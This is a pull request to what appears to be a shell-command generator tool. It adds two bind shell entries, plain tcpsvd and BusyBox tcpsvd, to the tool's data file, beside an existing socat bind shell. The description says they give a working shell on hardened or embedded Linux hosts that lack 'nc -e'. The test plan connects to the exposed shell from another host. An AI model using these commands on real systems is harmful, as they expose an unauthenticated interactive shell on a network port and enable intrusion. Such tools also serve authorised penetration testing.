### PR TITLE
add tcpsvd bind shell variants

### DIFF
--- a/js/data.js
+++ b/js/data.js
@@ -449,6 +449,16 @@ const bindShellCommands =  withCommandType(
             "name": "Socat (TTY) Bind",
             "command": "socat TCP-LISTEN:{port},reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane",
             "meta": ["bind", "mac", "linux"]
+        },
+        {
+            "name": "tcpsvd Bind",
+            "command": "tcpsvd -vE 0.0.0.0 {port} {shell} -i",
+            "meta": ["bind", "linux"]
+        },
+        {
+            "name": "BusyBox tcpsvd Bind",
+            "command": "busybox tcpsvd -vE 0.0.0.0 {port} {shell} -i",
+            "meta": ["bind", "linux"]
         }
     ]
 );


### PR DESCRIPTION
## Summary
- Adds `tcpsvd Bind` and `BusyBox tcpsvd Bind` entries to the Bind Shell list in `js/data.js`.
- `tcpsvd` (from ipsvd / busybox) listens on a TCP port and spawns a command per connection, giving a working bind shell in environments where `nc -e` / `ncat -e` aren't available (common on hardened/embedded Linux boxes where busybox is the only thing around).

Commands added:
- `tcpsvd -vE 0.0.0.0 {port} {shell} -i`
- `busybox tcpsvd -vE 0.0.0.0 {port} {shell} -i`

## Test plan
- [ ] Load the generator, switch to the Bind Shell tab, confirm the two new entries appear and that `{port}` / `{shell}` placeholders render correctly.
- [ ] On a Linux host with `ipsvd` or `busybox` installed, run the generated command and verify an interactive shell over `nc <ip> <port>` from another host.